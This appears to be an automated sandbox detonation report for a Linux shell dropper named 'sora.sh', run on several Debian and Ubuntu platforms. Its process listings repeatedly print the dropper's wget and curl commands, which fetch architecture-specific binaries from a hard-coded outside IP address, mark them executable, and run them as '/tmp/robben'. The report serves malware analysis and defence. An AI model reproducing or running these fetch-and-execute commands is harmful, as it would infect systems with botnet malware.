Analysis Overview
SHA256
19ae1084b4322732191f0325600ae869eb0527f11e5b2c2a7095fe14adaa1902
Threat Level: Shows suspicious behavior
The file sora.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-22 21:52
Signatures
Analysis: behavioral5
Detonation Overview
Submitted
2024-08-22 21:52
Reported
2024-08-23 00:30
Platform
debian9-mipsel-20240418-en
Max time kernel
265s
Max time network
266s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x robben sora.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-p3398a]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x robben sora.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-p3398a]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/bin/cat
[cat mipsel]
/bin/chmod
[chmod +x robben sora.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-p3398a]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x robben sora.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-p3398a]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/bin/cat
[cat i586]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/bin/cat
[cat i686]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-08-22 21:52
Reported
2024-08-23 00:30
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
111s
Max time network
481s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-timedated.service-Z3fTpE]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-timedated.service-Z3fTpE]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/bin/cat
[cat mipsel]
/bin/chmod
[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-timedated.service-Z3fTpE]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/bin/cat
[cat i586]
/bin/chmod
[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/bin/cat
[cat i686]
/bin/chmod
[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 89.187.167.3:443 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 91.189.91.98:80 | connectivity-check.ubuntu.com | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 91.189.91.97:80 | connectivity-check.ubuntu.com | tcp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-08-22 21:52
Reported
2024-08-23 00:31
Platform
ubuntu2004-amd64-20240611-en
Max time kernel
96s
Max time network
479s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-timedated.service-JgaXah systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-timedated.service-JgaXah systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-timedated.service-JgaXah systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 158.51.127.106:80 | tcp | |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 91.189.91.48:80 | connectivity-check.ubuntu.com | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| GB | 185.125.190.18:80 | connectivity-check.ubuntu.com | tcp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-22 21:52
Reported
2024-08-23 00:20
Platform
debian12-armhf-20240221-en
Max time kernel
45s
Max time network
605s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
